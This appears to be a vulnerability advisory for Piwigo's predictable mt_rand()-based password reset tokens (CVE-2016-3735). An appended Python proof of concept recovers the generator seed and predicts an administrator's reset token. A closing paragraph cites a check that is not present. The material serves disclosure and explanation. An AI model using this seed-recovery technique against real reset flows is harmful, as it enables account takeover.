PT-2022-7862 · Piwigo · Piwigo

Published

2022-01-28

·

Updated

2022-11-07

·

CVE-2016-3735

CVSS v3.1

8.1

High

Vector

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Name of the Vulnerable Software and Affected Versions

Piwigo (affected versions not specified)

Description

The issue affects Piwigo, an image gallery application written in PHP. When certain criteria are not met on the host, Piwigo falls back to PHP's mt_rand() to generate password reset tokens. mt_rand() is not a cryptographically secure generator: its output can be predicted once the seed used to produce it has been recovered, so an unauthenticated attacker who knows an administrator's email address and can request a password reset for that account can predict the reset token and take the account over.

Recommendations

At the moment, there is no information about a newer version that contains a fix for this vulnerability.
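The weakness behind this advisory is that MT19937, the generator behind PHP's mt_rand(), is seeded from a single 32-bit value, and that seed can be recovered from a few observed outputs, after which every later output is known. The script below is an added example, not Piwigo's code and not part of this advisory. It reimplements mt_srand()/mt_rand() as PHP has defined them since PHP 7.1 (an assumption on the PHP version; earlier builds use a slightly different twist step), uses a constructed mt_rand()-based token routine as a stand-in for the fallback the description mentions (the page does not show Piwigo's exact code), and shows an attacker recovering the seed from the reset token issued for their own account and then predicting the token issued next for the administrator. The seed value and the search window are constructed so the example runs in seconds; a real attacker searches the whole 32-bit seed space offline.

```python
"""Seed recovery against an mt_rand()-based reset token.
Added illustration for the Piwigo advisory; not Piwigo's own code."""


class PhpMtRand:
    """MT19937 as used by PHP's mt_srand()/mt_rand() since PHP 7.1 (assumption:
    pre-7.1 builds need their legacy twist instead). mt_rand() with no arguments
    returns the 32-bit output shifted right by one bit."""

    N, M = 624, 397

    def __init__(self, seed: int):
        self.mt = [0] * self.N
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, self.N):  # init_genrand(): expand the 32-bit seed into state
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = self.N  # forces a twist before the first output

    def _twist(self) -> None:
        mt, n, m = self.mt, self.N, self.M
        for i in range(n):
            y = (mt[i] & 0x80000000) | (mt[(i + 1) % n] & 0x7FFFFFFF)
            mt[i] = mt[(i + m) % n] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)
        self.index = 0

    def next_u32(self) -> int:
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11  # tempering
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF

    def mt_rand(self) -> int:
        return self.next_u32() >> 1


ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def weak_token(rng: PhpMtRand, length: int = 16) -> str:
    """Constructed stand-in for an mt_rand()-based reset token: one mt_rand()
    call per character. Piwigo's real fallback is not shown on the page."""
    return "".join(ALPHABET[rng.mt_rand() % len(ALPHABET)] for _ in range(length))


def recover_seed(observed: str, candidates):
    """Brute-force the seed that reproduces an observed token. Returns the seed
    and a generator positioned exactly where the server's generator is after
    issuing that token, i.e. ready to emit whatever the server hands out next."""
    for seed in candidates:
        rng = PhpMtRand(seed)
        if weak_token(rng, len(observed)) == observed:
            return seed, rng
    return None, None


def demo():
    # Constructed scenario: the server seeded its generator from a 32-bit value
    # the attacker can bracket (a timestamp-like number is used here).
    server_seed = 1_700_000_123
    server = PhpMtRand(server_seed)
    attacker_token = weak_token(server)  # reset link the attacker requested for their own account
    admin_token = weak_token(server)     # reset link issued next for the admin; attacker never sees it

    # Attacker side: only attacker_token and a plausible seed window are known.
    # The window is kept small so this runs quickly; offline tooling covers all 2^32 seeds.
    window = range(1_700_000_000, 1_700_002_048)
    seed, rng = recover_seed(attacker_token, window)
    predicted_admin_token = weak_token(rng) if rng is not None else None
    return seed == server_seed, predicted_admin_token == admin_token


if __name__ == "__main__":
    print(demo())  # (True, True): seed recovered, admin's reset token predicted
```

The first assertion in the check below pins the generator to PHP's documented behaviour (mt_srand(1); mt_rand() yields 895547922 on PHP 7.1 and later), which is what makes the rest of the demonstration meaningful: if the reimplementation matched only itself, recovering a seed would prove nothing about mt_rand().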

Weakness Enumeration

Related Identifiers

CVE-2016-3735

Affected Products

Piwigo